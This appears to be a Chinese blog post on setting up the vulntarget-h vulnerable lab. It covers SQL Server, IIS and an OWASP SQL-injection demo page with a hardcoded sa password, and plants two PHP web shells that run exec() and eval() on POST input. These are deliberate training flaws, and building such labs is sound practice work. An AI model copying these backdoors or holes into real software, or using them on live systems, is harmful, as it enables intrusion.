vuntarget免責(zé)聲明
00
相關(guān)漏洞技術(shù)
sql注入、文件包含、命令執(zhí)行,免殺等漏洞利用、隧道代理等
下載地址
百度云鏈接
https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q
提取碼:1p9p
其中vulntarget-h是本次環(huán)境
github地址:
https://github.com/crow821/vulntarget
測(cè)試說(shuō)明
1. 鏡像都是基于VM16做的,沒有向下兼容
2. 操作人員自行修改對(duì)應(yīng)IP
3. 下載靶機(jī),開機(jī)之后,確認(rèn)自己網(wǎng)絡(luò)配置好了,可以選擇本地做一個(gè)快照,原本的快照可能會(huì)因?yàn)橹谱靼袡C(jī)的處理器和當(dāng)前打開靶機(jī)的處理器不一致,導(dǎo)致快照恢復(fù)失敗,或者異常(見諒)
拓?fù)鋱D
01
vulntarget-h賬密
02
環(huán)境搭建
點(diǎn)擊確定
下一步->下一步->安裝->下一步->下一步
到這里全選繼續(xù)下一步->下一步->下一步
對(duì)所有用戶使用相同賬戶
輸入管理員賬號(hào)密碼
最后改成自動(dòng)
輸入sa密碼,添加administrator賬戶
添加賬號(hào)
然后一直下一步到安裝就好了
2.windows 2008 IIS安裝
勾選web服務(wù)器(IIS)
直接滾鍵盤,再回到管理網(wǎng)站選擇重新啟動(dòng)
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx
下載下來(lái)后刪掉13行,修改47行的密碼
private static string strSqlConnectionString = @'SERVER=.;UID=sa;PWD=Adminweishenmezhegehaiyaomima@;DATABASE=FoundStone_Bank';
點(diǎn)擊默認(rèn)文檔
https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql
點(diǎn)擊數(shù)據(jù)庫(kù)右鍵新建數(shù)據(jù)庫(kù),創(chuàng)建一個(gè)名為FoundStone_Bank的數(shù)據(jù)庫(kù)
點(diǎn)擊新建查詢復(fù)制配置文件
最后回到首頁(yè)用參數(shù)測(cè)試一下
這樣就成功了
這就不寫了
<?php
highlight_file(__FILE__);
exec($_POST['shell']);
//路過(guò)的腳本小子留下了一個(gè)后門,讀一下c:\phpstudy_pro\a.txt吧里面有好東西
?>
<?php
highlight_file(__FILE__);
eval($_POST['shell']);
?>
設(shè)置網(wǎng)站目錄不可寫,幾個(gè)用戶都修改
安裝火絨
然后是常規(guī)的安裝
聯(lián)系客服